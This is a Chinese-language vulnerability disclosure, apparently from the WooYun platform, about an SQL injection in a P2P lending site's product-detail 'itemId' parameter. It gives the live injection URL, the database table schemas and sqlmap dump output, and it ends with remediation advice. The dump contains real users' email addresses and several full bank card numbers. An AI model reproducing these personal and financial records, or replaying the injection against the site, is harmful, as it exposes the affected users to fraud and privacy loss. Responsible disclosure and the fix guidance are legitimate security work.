2015-07-29：积极联系厂商并等待厂商认领中，细节不对外公开。
2015-09-12：厂商已主动忽略该漏洞，细节向公众公开。
可泄露上万条用户数据，涉及的字段包括真实姓名、手机号、身份证号、银行卡号、邮箱以及登录密码/支付密码字段（从 password、paypassword 均为 varchar(64) 且另有 solt 列来看，疑似为加盐哈希存储，未验证）。
注入点（GET 参数 itemId，为一个 32 位十六进制 ID）：https://www.shandianjr.com/sdmall/detail?itemId=8a2b5b7d4e8d302c014e8da3bf7500ae
Database: p2p_sdd
Table: p2p_user
[55 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| accountType       | int(11)       |
| address           | varchar(200)  |
| appLoginStatus    | int(11)       |
| brokerId          | varchar(32)   |
| brokerRate        | decimal(10,8) |
| brokerStatus      | int(11)       |
| busiCode          | varchar(30)   |
| cardno            | varchar(22)   |
| cardnoStatus      | int(11)       |
| createBy          | varchar(32)   |
| createTime        | datetime      |
| deleteTime        | datetime      |
| disposeRemark     | varchar(1000) |
| disposeStatus     | int(11)       |
| email             | varchar(80)   |
| emailStatus       | int(11)       |
| guarType          | varchar(2)    |
| hfUserId          | varchar(50)   |
| id                | varchar(32)   |
| idcard            | varchar(18)   |
| idCardBeginDate   | bigint(20)    |
| idCardEndDate     | bigint(20)    |
| idCardPeriodType  | int(11)       |
| idcardStatus      | int(11)       |
| inBlackList       | tinyint(1)    |
| invitationCode    | varchar(6)    |
| InvitationMobile  | varchar(22)   |
| isDeleted         | tinyint(1)    |
| lastloginip       | varchar(30)   |
| lastlogintime     | bigint(20)    |
| logins            | int(11)       |
| mobile            | varchar(22)   |
| mobileStatus      | int(11)       |
| modify            | int(11)       |
| nickname          | varchar(40)   |
| p2pAccount_id     | varchar(32)   |
| p2pUserAccount_id | varchar(32)   |
| p2pUserInfo_id    | varchar(32)   |
| p2pUserPoint_id   | varchar(32)   |
| password          | varchar(64)   |
| paypassword       | varchar(64)   |
| pointGetTime      | bigint(20)    |
| registerip        | varchar(30)   |
| registertime      | bigint(20)    |
| solt              | varchar(10)   |
| telephone         | varchar(22)   |
| truename          | varchar(40)   |
| updateBy          | varchar(32)   |
| updateTime        | datetime      |
| userLevel         | int(11)       |
| username          | varchar(25)   |
| usrCustId         | varchar(40)   |
| usrMp             | varchar(40)   |
| version           | int(11)       |
| virtualStatus     | int(11)       |
+-------------------+---------------+
Database: p2p_sdd
Table: p2p_user_info
[22 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| address      | varchar(255) |
| area         | varchar(255) |
| birthday     | bigint(20)   |
| city         | varchar(255) |
| createBy     | varchar(32)  |
| createTime   | datetime     |
| deleteTime   | datetime     |
| ecpName      | varchar(255) |
| ecpRelation  | int(11)      |
| ecpTelephone | varchar(255) |
| id           | varchar(32)  |
| isDeleted    | tinyint(1)   |
| mobile       | varchar(255) |
| mobile1      | varchar(255) |
| mobile2      | varchar(255) |
| msn          | varchar(255) |
| province     | varchar(255) |
| qq           | varchar(255) |
| telephone    | varchar(255) |
| updateBy     | varchar(32)  |
| updateTime   | datetime     |
| version      | int(11)      |
+--------------+--------------+
Database: p2p_sdd
Table: p2p_account_cash
[25 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| amount            | decimal(19,2) |
| bank              | varchar(150)  |
| branch            | varchar(150)  |
| cardno            | varchar(22)   |
| collected         | decimal(19,2) |
| createBy          | varchar(32)   |
| createTime        | datetime      |
| dealno            | varchar(50)   |
| deleteTime        | datetime      |
| fee               | decimal(19,2) |
| id                | varchar(32)   |
| ip                | varchar(64)   |
| isDeleted         | tinyint(1)    |
| p2pAccountBank_id | varchar(32)   |
| p2pOrder_id       | varchar(32)   |
| p2pUser_id        | varchar(32)   |
| resultCode        | varchar(60)   |
| servFee           | decimal(19,2) |
| status            | int(11)       |
| updateBy          | varchar(32)   |
| updateTime        | datetime      |
| varifyRemark      | varchar(150)  |
| varifyTime        | bigint(20)    |
| verifyManger      | varchar(50)   |
| version           | int(11)       |
+-------------------+---------------+
数据可直接 dump（以下仅展示部分数据）。注意：下面的 sqlmap 输出已包含用户邮箱和完整银行卡号（cardno 列）等敏感信息，属于真实个人/金融数据，不应进一步传播。
[14:27:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0[14:27:33] [INFO] fetching entries of column(s) 'address, cardno, createTime, email, id, mobile, p2pAccount_id, password, paypassword, telephone, truename, username' for table 'p2p_user' in database 'p2p_sdd'[14:27:33] [INFO] retrieved: " "," ","2015-03-27 16:40:56","101","101","101",...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","15102648@qq.com",...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","848889405@qq.com"...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","365829784@QQ.com"...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","906987642@qq.com"...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","3752987@qq.com","...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","468377@qq.com","1...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","machunyu870221@ms...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","825336373@qq.com"...[14:27:36] [INFO] retrieved: " ","622909346304873318","2015-03-27 16:40:56","...[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","2281066038@qq.com...[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","102","102","102",...[14:27:36] [INFO] retrieved: " ","6228480470739286610","2015-03-27 16:40:56",...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","skdg999@163.com",...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","165065588@qq.com"...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1056572511@qq.com...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","234209540@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","602985115@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","456587965@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","789546@qq.com","1...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 
16:40:56","504587414@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","191120534@qq.com"...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","103","103","103",...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1773372893@qq.com...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","jsptest@sina.com"...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wang_doris3561@si...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","593859125@qq.com"...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","2530010576@qq.com...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","840712522@qq.com"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","153721877@qq.com"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1355041032@qq.com...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","328642097@qq.com"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","751116472@qq.com"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","104","104","104",...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","644047772@qq.com"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","269937228@qq.com"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","75114812@qq.com",...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","22965634362@qq.co...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","23311114@qq.com",...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","254844102@qq.com"...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","359502888@qq.com"...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","tsh626@163.com","...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","guohong368@yeah.n...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","abcd-50077@qq.com...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","105","105","105",...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 
16:40:56","suntrap73@163.com...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","xianyi97@126.com"...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","532594398@qq.com"...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","Asus01@126.com","...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","43263669@qq.com",...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","alsoen@qq.com","1...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","760061799@qq.com"...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","963505202@qq.com"...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","470991045@qq.com"...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1256387776@qq.com...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","106","106","106",...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","hejh27@126.com","...[14:27:47] [INFO] retrieved: " ","6222023100037069205","2015-03-27 16:40:56",...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","hellfy@163.com","...[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","hellfy@126.com","...[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wjg_ws@163.com","...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","46258407@qq.com",...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1585668092@qq.com...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","254984200@qq.com"...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","120871707@qq.com"...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","95327586@qq.com",...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","107","107","107",...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wslar11@2980.com"...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","xncxxw@qq.com","1...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","252438970@qq.com"...[14:27:51] [INFO] retrieved: " 
","6217002390000517497","2015-03-27 16:40:56",...[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","82289585@qq.com",...[14:27:51] [INFO] retrieved: " ","6215593100001469450","2015-03-27 16:40:56",...[14:27:51] [INFO] retrieved: " ","6214850230403088","2015-03-27 16:40:56","73...[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","25878577676@qq.co...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","zhangxuelovegang@...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","972156790@qq.com"...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","108","108","108",...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","dreamlang@yeah.ne...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","lhf0601@163.com",...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","cnkmmc@163.com","...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1309267374@qq.com...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","www.470654506@qq....[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","eahui@vip.qq.com"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","756629052@qq.com"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","36260086@qq.com",...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","381008078@qq.com"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1634696789@qq.com...[14:27:55] [INFO] retrieved: " "," ","2015-03-27 16:40:56","109","109","109",...[14:27:55] [INFO] retrieved: " ","6214830232822972","2015-03-27 16:40:56","95...
公司正在发展中，漏洞要赶紧修补：detail 接口的 itemId 参数应改为参数化/预编译查询，并在进入 SQL 前按格式白名单校验（该 ID 为 32 位十六进制字符串）；同时收紧 Web 应用所用数据库账号的权限，避免一个商品详情页的查询账号能够读取 p2p_user、p2p_account_cash 等含身份证号、银行卡号和密码字段的全表。此外，服务端指纹为 PHP 5.3.3 + Apache，PHP 5.3 分支在本报告发布时已停止官方维护，建议一并升级。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)